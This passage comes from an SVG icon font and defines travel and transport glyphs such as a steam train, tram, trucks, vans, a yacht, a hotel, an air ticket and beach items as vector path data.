<glyph glyph-name="train-steam" horiz-adv-x="1000" unicode="&#xee39;" d="M664 373v-352c0-4 0-4 1-1 2 11 6 21 11 30 6 11 14 21 23 29 9 9 20 15 32 20 12 5 25 7 38 7 27 0 51-9 71-26 18-16 30-36 34-59 1-4 1-4 1 0v285c0 4 2 10 4 13l38 55c2 3 1 6-3 6h-243c-4 0-7-3-7-7z m170-199h-129c-4 0-7 3-7 7v155c0 4 3 7 7 7h129c4 0 7-3 7-7v-155c0-4-3-7-7-7z m-648-96l-102-144c-2-4-2-9 0-12l3-4c3-3 7-5 11-5h92c4 0 7 3 7 7v73c0 4 3 7 7 7h28c4 0 7 4 7 7v261c0 4-3 7-7 7h-34c-4 0-7-3-7-7v-178c0-3-2-9-5-12z m647-11c-8 8-18 14-29 19-10 5-22 7-35 7-12 0-24-2-35-7-11-5-20-11-29-19-8-8-14-18-19-29-4-11-7-23-7-35 0-13 3-24 7-35 5-11 11-21 19-29 8-8 18-15 29-19 11-5 23-8 35-8 13 0 25 3 35 8s21 11 29 19c8 8 15 18 20 29 4 11 7 22 7 35 0 12-3 24-7 35-5 11-12 21-20 29z m-191 175h-24c-3 0-7 3-7 7v28c0 3-3 7-7 7h-80c-3 0-7-3-7-7v-28c0-4-3-7-7-7h-24c-3 0-7 3-7 7v28c0 3-3 7-7 7h-79c-4 0-7-3-7-7v-28c0-4-4-7-7-7h-14c-4 0-7 3-7 7v54c0 3-3 7-7 7h-89c-3 0-7-4-7-7v-196c0-4 3-7 7-7h380c3 0 7 3 7 7v127c0 4-3 8-7 8z m-383-242c2 0 4 2 6 4 1 1 2 2 3 3 8 8 19 13 31 13 12 0 23-5 31-13l3-3c2-2 6-4 10-4h16c4 0 8 2 9 4 1 1 2 2 3 3 9 8 19 13 32 13s23-5 32-13l3-3c1-2 5-4 9-4h16c4 0 8 2 10 4 1 1 1 2 3 3 8 8 19 13 31 13 12 0 23-5 31-13l3-3c2-2 6-4 10-4h10c4 0 8 2 10 4 1 1 2 2 3 3 8 8 19 13 31 13 12 0 23-5 31-13l3-3c2-2 4-4 6-4 2 0 3 3 3 7v73c0 4-3 7-7 7h-378c-4 0-7-3-7-7v-73c-1-4 1-7 3-7z m378-12c-9 9-19 13-31 13-13 0-23-4-32-13-2-2-4-4-5-6-5-8-8-16-8-26 0-12 5-22 13-31 9-8 19-12 32-12 12 0 22 4 31 12 8 9 13 19 13 31 0 10-3 18-8 26-1 2-3 4-5 6z m-98 0c-9 9-19 13-31 13-13 0-24-4-32-13-2-2-4-4-6-6-5-8-7-16-7-26 0-12 4-22 13-31 9-8 19-12 32-12 12 0 22 4 31 12 8 9 12 19 12 31 0 10-2 18-7 26-2 2-3 4-5 6z m-209 0c-8 9-19 13-31 13-12 0-23-4-31-13-2-2-4-4-6-6-5-8-7-16-7-26 0-12 4-22 13-31 8-8 19-12 31-12 12 0 23 4 31 12 9 9 13 19 13 31 0 10-2 18-7 26-2 2-4 4-6 6z m105 0c-9 9-19 13-32 13s-23-4-32-13c-2-2-3-4-5-6-5-8-8-16-8-26 0-12 5-22 13-31 9-8 20-12 32-12s23 4 32 12c9 9 13 19 13 31 0 10-3 18-8 26-1 2-3 4-5 6z m-180 455v-110c0-4 4-7 7-7h89c3 0 7 3 7 7v110c0 4-3 7-7 7h-88c-4 0-8-3-8-7z m8 22h88c4 0 8 3 10 6l26 48c2 4 0 6-4 6h-44c-4 0-6 3-5 7 8 19 20 38 36 46 37 17 36-36 121 5 86 41 76 13 104 0 28-12 50-28 110 4 59 31 58-11 65-11s72-37 98 44c26 81-49 119-78 119-27 0-52-38-89-11-36 29-51 23-105 13-54-11-60 5-84 17-24 12-89 62-138-4-49-64-9-82-32-96-23-14-52-42-54-61-1-16-12-38-8-65 0-4-2-7-6-7h-44c-4 0-5-3-4-6l26-48c2-3 7-6 11-6z" />
<glyph glyph-name="tram" horiz-adv-x="1000" unicode="&#xee3a;" d="M583 653l50 111c81-15 94-43 94-44 1-2 3-4 6-4 1 0 1 0 2 1 3 1 5 4 4 8-1 2-25 63-239 63s-238-61-239-63c-1-4 0-7 4-8 3-2 6 0 8 3 0 1 13 29 94 44l50-111c-198-22-228-120-228-153v-424c0-44 36-80 79-80h43l-49-74c-2-3-1-7 1-9 2 0 3-1 4-1 2 0 4 1 5 3l54 81h348l54-81c1-2 3-3 5-3 1 0 3 1 4 1 2 2 3 6 1 9l-49 74h42c44 0 80 36 80 80v424c0 35-31 132-228 153z m-204 114c31 5 70 8 121 8s89-3 120-8l-50-113c-22 2-45 3-70 3s-49-1-70-3l-51 113z m198-205v-5c0-9-7-17-17-17h-121c-9 0-17 8-17 17v5c0 10 8 17 17 17h122c9 0 16-7 16-17z m-252-488c-32 0-58 26-58 59 0 32 26 58 58 58s58-26 58-58c0-33-26-59-58-59z m350 0c-33 0-59 26-59 59 0 32 26 58 59 58 32 0 58-26 58-58 0-33-26-59-58-59z m58 189c0-18-15-33-34-33h-399c-18 0-33 15-33 33v205c0 19 15 34 33 34h399c19 0 34-16 34-34v-205z" />
<glyph glyph-name="truck-alt" horiz-adv-x="1000" unicode="&#xee3b;" d="M97 221v-3c0-16 10-29 24-33 12 30 41 51 75 51 34 0 63-22 75-52h373v70h-513c-19 0-34-15-34-33z m96 3c-33 0-59-27-59-60 0-32 26-59 59-59 33 0 59 27 59 59s-26 60-59 60z m0-101c-23 0-41 19-41 41s18 41 41 41 41-18 41-41-18-41-41-41z m661 347c-7 9-17 11-23 11h-149c-6 0-11-5-11-11v-269c0-7 5-12 11-12h40c13 28 40 47 72 47s60-19 73-47h59c6 0 11 5 11 12v134l-83 135z m19-117h-158c-6 0-11 5-11 11v84c0 7 5 12 11 12h93c17 0 22-4 26-12l51-84c0-6-5-11-12-11z m56-138c0-6-5-10-11-10-6 0-10 4-10 10v20c0 6 4 11 10 11 6 0 11-5 11-11v-20z m-137 9c-33 0-59-27-59-60 0-32 26-59 59-59s59 27 59 59c0 33-26 60-59 60z m0-101c-23 0-41 19-41 41s18 41 41 41 41-18 41-41-18-41-41-41z m-714 152h550c9 0 16 7 16 15v290c0 9-7 16-16 16h-550c-8 0-15-7-15-16v-290c0-8 7-15 15-15z" />
<glyph glyph-name="truck-loaded" horiz-adv-x="1000" unicode="&#xee3c;" d="M322 235c-43 0-77-34-77-77 0-43 34-77 77-77 42 0 77 34 77 77 0 43-35 77-77 77z m0-115c-22 0-39 17-39 38 0 21 17 39 39 39 21 0 38-18 38-39 0-21-17-38-38-38z m-67 115h-172c-7 0-13-5-13-12v-38c0-7 6-12 13-12h138c4 25 16 46 34 62z m470 0c-43 0-77-34-77-77 0-43 34-77 77-77s77 34 77 77c-1 43-35 77-77 77z m0-115c-22 0-39 17-39 38 0 21 17 39 39 39s38-18 38-39c0-21-17-38-38-38z m200 115h-30v168c0 20-6 39-17 56l-75 111c-19 27-49 44-82 44h-117c-14 0-25-11-25-25v-354h-191c18-16 31-37 34-62h202c7 49 49 87 101 87s93-38 100-87h100c7 0 13 5 13 12v38c0 7-6 12-13 12z m-123 201h-154c-7 0-13 6-13 13v85c0 7 6 13 13 13h94c4 0 8-2 10-6l60-85c6-8 0-20-10-20z m-282-176h-433c-13 0-24 11-24 25v111c0 14 11 25 24 25h433c14 0 25-11 25-25v-111c0-14-11-25-25-25z m-259 198h-174c-13 0-24 11-24 24v112c0 14 11 25 24 25h173c14 0 25-11 25-25v-111c0-14-11-25-24-25z m259 0h-173c-14 0-25 11-25 24v112c0 14 12 25 25 25h173c14 0 25-12 25-25v-112c0-13-11-24-25-24z" />
<glyph glyph-name="truck" horiz-adv-x="1000" unicode="&#xee3d;" d="M917 487c-2 0-5 0-8 0v22c0 23-10 33-32 33-17 0-33 0-50 0v246h-655v-246c-18 0-35 0-53 0-17 0-28-11-28-29 0-9 0-17 0-26-4 0-6 0-9 0-10 0-18-8-18-18-1-43-1-85 0-127 0-10 7-18 18-19 15 0 30 0 45 0 10 1 18 8 18 18 0 43 0 85 0 128 0 10-8 17-18 18-3 0-6 0-9 0v27h54v-300c-19-5-27-14-27-33 0-31 1-63 0-94 0-17 4-30 22-37-18-6-23-18-22-34 1-5 0-10 0-15 1-23 5-29 27-35 0 0 1-1 1-2 0-9 0-17 0-26 0-16 9-25 25-25 29 0 57 0 86 0 15 0 25 9 25 25v29h381c1-1 1-1 1-1 0-10 0-20 0-29 0-15 10-24 24-24 29 0 58 0 87 0 16 0 25 9 25 25 1 9 0 19 0 26 8 5 16 8 21 13 10 9 10 53 1 63-4 4-10 7-14 10 15 8 20 15 20 33 0 31 0 63 0 94 0 23-5 30-27 37v300h54v-27c-4 0-6 0-9 0-10-1-18-8-18-19 0-42 0-84 0-126 0-11 8-19 18-19 15 0 30 0 45 0 11 1 18 9 18 20 1 41 1 83 0 124 0 12-7 19-19 20z m-717 137h107c7 20 16 28 30 28 14-1 23-9 27-27h26c6 19 15 27 29 27 13-1 22-9 27-28 2 0 4 0 5 0h20c6 19 15 28 29 28 14 0 22-8 28-28h25c6 19 14 27 29 28 14 0 23-9 28-27h25c5 18 14 27 28 27s24-9 29-28h107v-82h-27v14c0 24-17 41-41 41-142 0-285 0-428 0-12 0-24 0-36 0-24-1-40-17-40-40 0-5 0-9 0-14h-27c0 26 0 53 0 81z m600-110v-300h-28v300h28z m-488-218c3 15 18 27 35 27 58 0 117 0 175 0 43 0 86 0 129 0 17 0 31-9 37-24 0-1 0-2 0-3h-376z m379-28v-27h-382v27h382z m-491 246h27v-300h-27v300z m27-520c-14 0-27 13-27 27-1 15 12 28 27 29 14 0 27-13 27-27 1-15-12-28-27-29z m55 118c0-5-3-8-8-8-22 0-45 0-67 0-5 0-7 2-7 8 0 13 0 25 0 38 0 6 2 9 8 9 11 0 22 0 33 0 11 0 22 0 33 0 5 0 8-3 8-8 0-13 0-26 0-39z m22 266c-14 0-22 8-23 22 0 39 0 79 1 118 0 16 7 24 23 24 55 0 111 0 167 0v-164c-2 0-4 0-6 0-54 0-108 0-162 0z m5-165h381v-26h-381v26z m342-136c-23-1-47 0-70 0-77 0-155 0-232 0-18 0-33 10-38 27h377c-2-16-18-27-37-27z m40 55h-382v26h382c0-2 0-4 0-6 0-7 0-13 0-20z m1 246c-50 0-100 0-150 0h-15v164h167c16 0 24-8 24-24 0-38 0-76 0-114 1-19-7-26-26-26z m81-384c-15 0-28 13-28 28 0 15 13 27 28 27 14 1 27-12 27-27 0-14-12-28-27-28z m18 110c-10 0-21 0-32 0-11 0-21 0-32 0-6 0-9 3-9 9 0 12 0 25 0 37 0 6 2 9 9 9 21 0 43 0 65 0 6 0 8-2 8-8 0-13 0-26 0-38 0-7-3-9-9-9z" />
<glyph glyph-name="van-alt" horiz-adv-x="1000" unicode="&#xee3e;" d="M201 298c-36 0-64-29-64-64 0-36 28-64 64-64s64 28 64 64c0 35-29 64-64 64z m0-100c-20 0-36 16-36 36 0 19 16 35 36 35 19 0 35-16 35-35 0-20-16-36-35-36z m602 100c-35 0-64-29-64-64 0-36 29-64 64-64s64 28 64 64c0 35-29 64-64 64z m0-100c-20 0-36 16-36 36 0 19 16 35 36 35 20 0 36-16 36-35 0-20-16-36-36-36z m-85 30h-430c-5 0-9-4-9-9v-4c0-5 4-9 9-9h430c5 0 9 4 9 9v4c0 5-4 9-9 9z m219 180c0 14-1 29-4 43-5 20-12 41-20 61-5 12-14 19-29 19-167-1-333-1-499-1-10 0-21 1-31 0-7-1-15-2-21-6-19-13-39-26-56-42-28-28-54-59-81-88-2-2-5-3-7-4-30-6-59-15-87-27-24-11-36-30-38-55-3-22-1-45-1-67 0-5 2-7 7-7 11 0 21 0 32 0h25c4 43 36 69 66 72 46 5 82-29 84-72 3 0 6 0 9 0 145 0 289 0 434 0 7 0 9 2 10 8 7 39 31 58 59 63 43 8 82-20 88-63 0-3 3-8 6-8 17 0 35 0 54 0 0 4 0 7 0 10 0 55 1 109 0 164z m-821-87h-15c-12 0-15 4-12 16 1 2 4 4 7 4 6 1 14 0 20 0 8 0 6-6 7-11 0-5 0-9-7-9z m323 104c0-2 0-5 0-8h-178c0 2 0 4 1 5 22 24 42 50 70 68 9 6 19 10 30 9 22 0 45 0 67 0 8 0 11-1 10-9 0-22 0-43 0-65z" />
<glyph glyph-name="van" horiz-adv-x="1000" unicode="&#xee3f;" d="M201 298c-36 0-64-29-64-64 0-36 28-64 64-64s64 28 64 64-29 64-64 64z m0-100c-20 0-36 16-36 36 0 19 16 35 36 35 19 0 35-16 35-35s-16-36-35-36z m602 100c-35 0-64-29-64-64 0-36 29-64 64-64s64 28 64 64-29 64-64 64z m0-100c-20 0-36 16-36 36 0 19 16 35 36 35 20 0 36-16 36-35s-16-36-36-36z m-85 30h-430c-5 0-9-4-9-9v-4c0-5 4-9 9-9h430c5 0 9 4 9 9v4c0 5-4 9-9 9z m219 180c0 14-1 29-4 43-5 20-12 41-20 61-5 12-14 19-29 19-166-1-333-1-499-1-10 0-21 1-31 0-7-1-15-2-21-6-19-13-39-26-56-42-28-28-54-59-81-88-2-2-5-3-7-4-30-6-59-15-87-27-24-11-36-30-38-55-3-22-1-45-1-67 0-5 2-7 7-7 11 0 21 0 32 0h26c3 43 35 69 65 72 46 5 82-29 84-72 3 0 6 0 9 0 145 0 289 0 434 0 7 0 9 2 10 8 7 39 31 58 59 63 44 8 82-20 88-63 0-3 4-8 6-8 18 0 36 0 54 0 0 4 0 7 0 10 0 55 1 109 0 164z m-821-87c-3 0-7 0-11 0h-3c-13 0-16 4-13 16 1 2 4 4 7 4 7 1 14 0 21 0 7 0 5-6 6-11 0-5 0-9-7-9z m323 104c0-2 0-5 0-8h-178c0 2 0 4 1 5 22 24 42 50 70 68 9 6 19 10 30 10 23-1 45-1 67 0 8 0 11-2 10-10 0-22 0-43 0-65z m180-2c0-4-1-7-6-7-45 0-89 0-135 0 0 4-1 6-1 9 0 22 0 44 0 65 0 7 2 9 8 9 42 0 85 0 127 0 5 0 7-2 7-7 0-23 0-46 0-69z m158 3c1-6-2-9-9-9-41 0-82 0-123 0-6 0-8 2-8 8 0 22 0 45 0 67-1 7 3 8 8 8 21 0 42 0 62 0 21 0 41-1 61 0 7 0 10-2 9-9 0-22 0-43 0-65z m36-10c-20 0-19-3-19 19 1 19 1 37 0 55 0 7 2 9 9 9 23 0 46 0 69 0 6 1 9-2 10-7l13-60c1-4 2-9 4-16-30 0-58 0-86 0z" />
<glyph glyph-name="yacht" horiz-adv-x="1000" unicode="&#xee40;" d="M916 341l22 46h-231l-59 53h-331l-90 66-20 4 72-69h-72s0-29 108-26c52 5 91-102 43-96 0 0-172 1-186 0-28-2-53-53-68-91-1 1-8 2-36-1-8-3-5-20-5-20-4-10 28-17 28-17h673s217 126 152 151z m-339 30h-46l-82 44h136l-8-44z m24-3l9 47h17l56-47h-82z m154-20l-5 0-30 28h47l-12-28z m57 1c-13 0-29-1-44-1l11 27h45l-12-26z m49-1c-11 0-23 0-36 1l12 27h36l-12-28z m12-1l13 29h33l-14-32c-8 2-19 3-32 3z" />
<glyph glyph-name="5-star-hotel" horiz-adv-x="1000" unicode="&#xee41;" d="M559 126v510h-118v-511h30v11c0 16 0 33 1 50 1 21 21 34 39 26 12-5 18-15 18-28v-58h30z m-87 481h56v-57h-56v57z m56-326h-56v57h56l0-57z m0 134h-56v57h56v-57z m-232-290h113v373h-113v-373z m28 347h57v-57h-57v57z m0-134h57v-57h-57v57z m267 161v-375h114v8c0 1 0 2 0 3 0 119 0 238 0 357 0 2-1 4-1 7l-113 0z m28-27h57v-57h-57v57z m57-191h-56v57h56v-57z m-524-156h113v238h-113v-238z m28 213h57v-57h-57v57z m556-213h112v238h-112v-238z m27 213h58v-57h-58v57z m-614-232v-124h702v124h-702z m249-102h-17v38h-34v-38h-17v82h17v-28h34v28h17v-82z m95 24c-1-2-2-5-4-7-5-7-12-13-20-16-5-2-11-3-17-3-3 0-6 0-8 0-6 2-12 4-16 7-2 1-5 3-7 5-4 4-7 9-9 14-3 5-4 11-4 17 0 1 0 3 1 4 0 7 3 14 7 20 3 5 7 9 12 12v0c7 5 15 7 24 7 9 0 18-2 25-7 5-3 9-7 12-12 5-7 7-15 7-24 0-6-1-11-3-17z m43 43v-67h-17v67h-21l3 15h52l4-15h-21z m79 0h-31v-15h31v-16h-31v-20h31v-16h-49v82h49v-15z m55-67h-45v82h17v-66h28v-16h0z m-208 66c-3 1-6 2-10 2-3 0-6-1-10-2 0 0-1-1-2-1-1-1-2-1-3-2-1 0-2-1-3-3v0c-2-1-3-2-4-4-1-1-2-3-2-5-1-3-2-6-2-10 0-1 0-2 0-3 0-4 2-8 4-12 3-4 7-8 12-10 4-1 7-2 10-2 5 0 10 1 15 5 7 5 11 12 11 22 0 4 0 7-2 10-2 7-7 12-14 15z m-313-108h702v-50h-702v50z m308 696l43 22 42-22-8 47 34 33-47 7-22 43-21-43-47-7 34-33-8-47z m-140-139l36 19 35-19-6 40 29 29-40 6-18 36-18-36-40-6 29-29-7-40z m295 0l36 19 36-19-7 40 29 29-40 6-18 36-18-36-40-6 29-29-7-40z m-440-131l36 19 36-19-7 40 29 28-40 6-18 36-18-36-40-6 29-28-7-40z m582 0l36 19 36-19-7 40 29 28-40 6-18 36-18-36-40-6 29-28-7-40z" />
<glyph glyph-name="air-ticket" horiz-adv-x="1000" unicode="&#xee42;" d="M921 534l-28 30c-46-44-120-43-164 4-44 46-42 119 5 164l-28 29c-23 24-62 25-86 2l-539-512c-24-23-25-61-2-85l28-30c46 44 120 42 164-4 44-46 42-120-4-164l28-29c22-24 61-25 85-2l539 512c24 23 25 61 2 85z m-368 23c5 5 12 5 17 0l140-148c5-5 5-12 0-17-5-4-13-4-17 1l-141 147c-4 5-4 13 1 17z m-146-152c6 0 12 0 17 0 6 0 9-3 12-7 15-23 30-46 45-69 4-6 8-12 12-18-11 4-22 7-32 11-15 5-31 11-46 16-3 1-4 2-4 5-3 18-7 36-10 54-1 5 1 8 6 8z m208-206c-2-5-6-7-12-7-10-1-21 2-31 5-32 11-64 23-97 35-3 1-5 1-8 0l-127-50c-4-2-8-2-13 0-5 3-11 6-17 9-5 2-6 6-1 10 23 20 46 40 69 60 2 1 4 2 5 4-14 7-28 14-41 22-20 11-41 23-61 35-4 3-9 6-12 10-4 5-7 10-4 16 3 7 8 9 15 9 2 0 3 1 3 3 0 14 0 28 1 42 0 6 2 7 7 5l0 0c20-8 15-4 25-23 5-11 10-22 16-33 0-1 1-3 3-3 36-9 72-21 107-34 39-13 78-27 117-41 20-7 36-19 47-38 1-1 3-2 2-3-1-1-3-1-4-1-7 0-14 2-20 4-4 1-5 1-6-3 0-5 2-9 7-11 9-3 18-6 27-5 2 1 3 0 3-2 1-5 1-10 0-15z m97 115c-4-5-12-5-17 0l-221 233c-4 4-4 12 1 17 5 4 12 4 17-1l221-232c4-5 4-13-1-17z" />
<glyph glyph-name="beach-bed" horiz-adv-x="1000" unicode="&#xee43;" d="M272 432c25 8 50 16 74 24 75 24 150 48 225 72 4 1 9 1 5 8-25 49-55 94-96 132-24 23-51 42-83 52-39 11-72 1-96-32-8-10-14-21-19-32-19-45-23-92-24-137 1-30 3-56 6-82 1-6 2-8 8-5z m-46-9c-3 19-5 39-6 58-2 46-1 93 9 138 5 18 10 36 18 54-88-45-184-214-175-305 1 0 3 0 4 0 49 16 97 32 146 47 4 2 5 4 4 8z m94 330c7 4 14 7 21 8 10 0 10 5 6 11l-1 5c-5 8-14 12-23 10-8-3-14-10-14-20 0-3 2-6 3-10 1-5 3-6 8-4z m291-200c4-8 7-10 16-7 49 16 98 32 147 47 8 3 8 5 3 11-44 50-96 87-158 111-54 21-110 30-168 26 20-12 38-26 55-42 45-42 78-92 105-146z m-4-568c-6 19-6 19-26 19-4 0-9 0-13 0-6 0-8-1-6-7 7-20 14-41 20-61 4-11 14-17 25-13 11 3 16 13 12 25l-12 37z m303 236c-17 9-37 3-48-15-4-8-9-16-15-23-43-54-101-78-169-80-47-1-93 0-139 0v-1c-31 0-62 1-93 0-45 0-90-2-134-11-78-17-136-61-183-124-9-12-8-29 1-40 9-13 25-18 40-13 8 3 14 10 19 17 28 36 61 65 104 81 38 14 79 19 120 19 83 1 166 1 249 1 46 0 91 7 134 26 55 24 98 61 128 114 10 19 4 40-14 49z m-478 172c26-81 53-163 80-244 6-19 6-19 26-19 4 0 8 1 12 0 8-1 9 2 6 9-28 84-55 169-83 253-2 7-7 15-5 20 2 6 13 6 20 9 101 32 202 65 304 98 13 4 19 14 15 26-3 11-14 15-27 11-11-4-22-7-33-11l-570-184c-27-9-53-17-80-26-12-4-17-14-13-25 3-10 13-15 24-12 2 0 4 1 6 2 102 33 204 66 306 99 7 2 10 1 12-6z m327-433c0 13-1 26 0 39 0 4-2 6-6 6-13 0-26 0-39 0-4 0-6-1-6-6 0-26 0-51 0-77 0-4 1-6 6-6 13 1 26 1 39 1 4 0 6 1 6 6 0 12 0 25 0 37z" />
<glyph glyph-name="beach" horiz-adv-x="1000" unicode="&#xee44;" d="M906 249l-13 13c-11 11-28 11-39 0l-55-55h-190c-12 0-22-10-22-22v-97h-116v308c19 22 47 36 78 36 40 0 77-24 92-62 16 38 52 62 93 62 41 0 77-24 93-62 0 200-158 362-356 370v32c0 9-6 16-15 16s-15-7-15-16v-32c-198-8-356-170-356-370 16 38 52 62 93 62s77-24 93-62c15 38 52 62 92 62 31 0 59-13 78-36v-308h-138c-16 0-28-12-28-28v-18c0-15 12-28 28-28h73l-56-64c-8-10-7-24 2-32 5-4 10-5 15-5 6 0 12 2 17 7l55 64h258l58-58c9-9 23-9 31 0s9 23 0 32l-56 56h67c15 0 28 12 28 27v19c0 10-6 19-14 24l125 125c11 11 11 29 0 40z m-435 460s118-44 170-284c-24 24-57 38-92 38-29 0-56-9-78-25v271z m-200-284c-24 24-57 38-93 38-18 0-36-4-52-10 36 142 163 249 315 256-135-52-170-284-170-284z m411-337h-51v74h123l-72-74z" />
<glyph glyph-name="camping-vest" horiz-adv-x="1000" unicode="&#xee45;" d="M331 161c-6 0-14 2-13-9 0-13-1-26 0-38 0-8-2-12-10-13-29-7-58-7-88 0-7 2-10 5-10 13 1 12 0 25 1 37 0 10-6 10-13 10-8 0-13-1-12-11 0-16 1-32-1-49-1-13 6-18 17-21 30-10 61-11 92-8 45 5 50 11 49 51 0 9-1 19 0 29 0 9-5 10-12 9z m482-39h0c0 9-1 19 0 29 0 8-3 11-11 10-7-1-16 2-15-10 1-12 0-24 0-36 1-9-3-13-11-15-29-6-58-6-87 1-7 1-10 5-9 13 0 12-1 24 0 37 1 11-6 10-13 10-8 0-13 0-13-10 1-18 1-36 0-54 0-9 3-12 11-15 38-14 78-15 117-6 31 7 31 8 31 41v5z m-443 162h0c0 9-1 18 0 28 0 9-4 11-13 11-8 0-13-1-13-11 1-13 0-26 0-39 1-6-2-9-8-11-30-7-60-7-89 0-7 2-10 5-10 12 1 12 0 25 0 37 0 8-1 13-11 12-8 0-14 0-14-11 1-18 1-35 0-52 0-10 3-14 12-17 43-15 85-15 128-3 14 4 20 10 18 25-1 6 0 12 0 19z m394-44c22 6 22 6 22 29v15c0 8-1 17 0 25 1 11-3 14-14 14-12 0-12-5-11-13 0-11-1-23 0-34 0-8-3-12-12-14-28-7-57-6-85 0-8 1-11 5-11 13 1 13 0 25 0 37 1 8-1 12-10 11-6-1-16 4-15-10 0-19 0-39 0-58 0-8 4-10 10-12 41-15 84-15 126-3z m148 121c-37 39-46 90-48 141-3 48 5 94 14 140 5 23-8 43-31 48-12 3-24 5-36 8-59 16-117 35-164 76-14 13-29 16-47 10-13-4-27-9-42-12-53-11-106-7-157 12-19 7-35 3-49-10-19-18-41-31-65-42-42-19-86-32-131-41-28-6-39-25-34-53 11-54 19-108 12-163-6-47-20-89-54-123-13-12-18-26-18-44 1-49 0-98 0-147h2c0-50 1-100 0-150 0-19 8-32 24-40 14-7 29-13 44-19 47-17 97-25 147-31 44-6 88-8 132-8 20-1 34 8 42 27 5 11 3 28 15 34 11 5 26 2 39 1 28 0 28 0 36-27 9-26 22-36 49-35 56 1 111 4 166 13 52 8 102 20 149 43 19 9 29 23 29 45 0 93 0 186 1 278 1 27-5 49-25 69z m-512-236c-3-35-6-70-8-105l-1-4c-2-22-2-23-24-22-69 3-138 11-204 32-20 6-20 7-20 27v116h0c0 41 0 82 0 123 0 7 1 12 6 17 44 51 62 111 66 176 2 42 0 84-7 125-1 7 1 11 8 13 39 10 78 23 114 42 6 3 9 2 9-6 2-67 23-130 52-190 14-28 16-58 16-88 3-85 0-170-7-256z m151 18c1-24 3-49 5-74 1-10-1-15-13-14-15 1-29 0-44 0v0c-14 0-28 0-42-1-10 0-15 2-14 14 3 31 4 63 7 95 4 60 5 121 5 182 0 35-2 71-8 107-5 24-17 44-26 66-18 43-32 87-35 134 0 14 1 28 5 41 1 7 4 8 11 7 43-13 87-16 131-12 20 1 39 5 58 10 17 4 19 3 21-15 3-29 0-57-6-84-9-37-21-72-38-105-15-31-20-64-22-98-6-84-1-168 5-253z m305-98c0-9-2-13-10-16-46-16-93-25-141-30-25-2-50-4-76-5-18-1-19-1-21 18-3 27-6 54-7 81-5 65-9 130-10 195 0 49-1 98 6 147 2 11 5 21 10 31 24 48 42 98 50 152 2 13 3 27 4 41 0 7 2 9 9 5 36-17 72-31 111-40 8-2 12-6 10-16-8-49-10-99-4-149 7-55 25-105 61-147 6-7 9-14 9-23-1-82-1-163-1-244z" />
<glyph glyph-name="direction-sign" horiz-adv-x="1000" unicode="&#xee46;" d="M928 569c-46 35-92 69-137 103-12 9-24 13-39 13-62 0-123 0-185 0-8 0-9 2-9 9 0 16 0 32 0 48 0 18-12 30-30 30-18 1-37 1-55 0-19 0-31-11-31-30 0-16 0-33 0-49 0-7-2-8-9-8-38 0-76 0-114 0-30 0-52-22-52-52 0-52 0-104 0-155 0-33 22-55 55-55 37 0 75 0 112 0 6 0 8-2 8-8-1-14-1-27 0-41 0-8-2-10-10-10-62 0-125 0-187 0-12 0-23-3-33-11-47-35-94-70-141-105-12-9-12-21 1-30 46-35 93-70 140-105 10-8 21-11 34-11 30 0 61 0 92 0 31 0 63 0 95 0 8 0 9-2 9-10 0-44 0-89 0-134 0-20 12-31 32-31h51c22 0 33 11 33 33 0 44 0 89 0 133 0 7 2 9 9 9 38 0 75 0 113 0 30 0 53 22 53 53 0 52 0 104 0 156 0 31-22 53-54 53-37 0-75 0-113 0-6 0-9 1-8 8 0 14 0 27 0 40-1 8 1 11 10 11 62 0 125 0 187 0 12 0 23 3 33 11 47 35 93 70 140 105 13 10 13 21 0 30z m-269-263c15 0 16-1 16-16v-116c0-12-2-14-14-14-136 0-273 0-410 0-5 0-9 1-12 4-27 19-54 39-81 59-11 8-11 13 0 21 26 19 53 38 79 58 5 3 9 5 15 5 68-1 136-1 204-1 68 0 136 0 203 0z m183 238c-26-20-53-39-79-58-5-4-9-5-15-5-136 0-272 0-407 0-15 0-16 1-16 16v115c0 13 2 15 15 15h205c67 0 135 0 202 0 6 0 12-1 17-5 26-20 52-38 78-58 11-8 11-12 0-20z" />
<glyph glyph-name="hill-side" horiz-adv-x="1000" unicode="&#xee47;" d="M937 345c-2 7-6 12-9 18-28 59-73 98-136 114-31 8-62 17-92 26-35 10-64 28-83 60-12 20-29 36-47 51-7 6-15 12-23 14-7 1-13 1-19 0-25-5-39-28-52-49-23-39-52-75-76-114-10-15-22-29-38-39-13-8-22-7-33 3-7 7-13 16-18 24-6 7-11 14-17 19-12 11-25 10-37-1-5-5-10-12-14-19-25-37-46-77-73-113-21-29-50-49-78-71-9-8-23-12-29-23-1-2-1-5 0-6 8-9 23-3 33-8 14-5 23-15 26-29 3-12 7-15 19-17 4 0 9-1 14-1 15 0 23-9 27-22 2-7 3-14 4-20 0-2 1-4 3-5 2 0 3 1 4 3 11 19 25 36 36 55 4 8 3 14-1 21-8 13-20 22-31 32-2 3-5 4-8 9 15-8 31-11 45-17 16-7 20-17 10-33-12-20-25-39-38-58-2-3-4-6-6-10-2-3-6-6-4-9 2-5 8-4 12-4 18 1 33 9 44 24 13 17 19 38 21 60 1 4-1 8 3 10 2 2 5-2 8-4 4-3 1-6 0-9-8-27-13-55-22-82-2-5-2-11-2-16 2-10 8-12 16-7 15 10 22 24 23 42 1 22 3 43-3 66 19-7 28-26 23-46-6-21-17-41-24-62-1-3-5-7-1-10 4-3 7 2 10 4 8 7 17 14 25 20 23 20 44 40 51 73 6-22 1-39-13-54-10-10-21-21-31-32-4-4-9-9-12-15-4-6-5-14 3-16 4-1 9-1 13 0 15 3 24 17 33 29 20 29 40 58 61 86 5 7 3 10-4 13-10 4-17 10-20 20-4 11-12 16-22 19-7 2-15 3-22 4-26 3-49 9-66 32-10 15-25 25-40 34-12 6-22 13-30 23-5 5-12 10-8 18 3 7 11 6 18 7 15 1 31-3 46-2 13 0 17 5 14 18-4 16-9 31-13 46-1 5-8 14-2 16 4 2 5-4 7-7 22-29 49-52 82-67 13-6 27-10 41-10 4 0 9 0 10 4 1 4-2 6-5 9-4 3-8 5-11 8 13-2 25-6 37-9 29-8 57-18 88-19 11 0 22 0 32-2 13-3 25-6 35-15-6-3-11-2-16-2-13-1-27-2-40-2-3-1-7 0-8-4 0-4 3-5 6-5 10-3 21-5 31-6 25-2 49-1 73-1 4 0 10 3 11-3 0-4-6-5-10-6l-23-7c-2-1-5-2-5-6 1-3 4-3 7-3 28 2 55 4 83 5 2 0 6 0 7 3 0 4-3 5-4 7-13 12-27 21-42 28-35 16-72 27-110 35-18 4-36 6-56 6 4 5 7 9 9 13 6 13 15 18 30 17 16-1 32 3 44 15 7 8 16 10 26 10 10-1 19-2 28-4 29-6 57-18 85-29 4-1 9-4 12 0 3 4 0 8-2 12-7 13-16 25-19 40-1 4-4 7-7 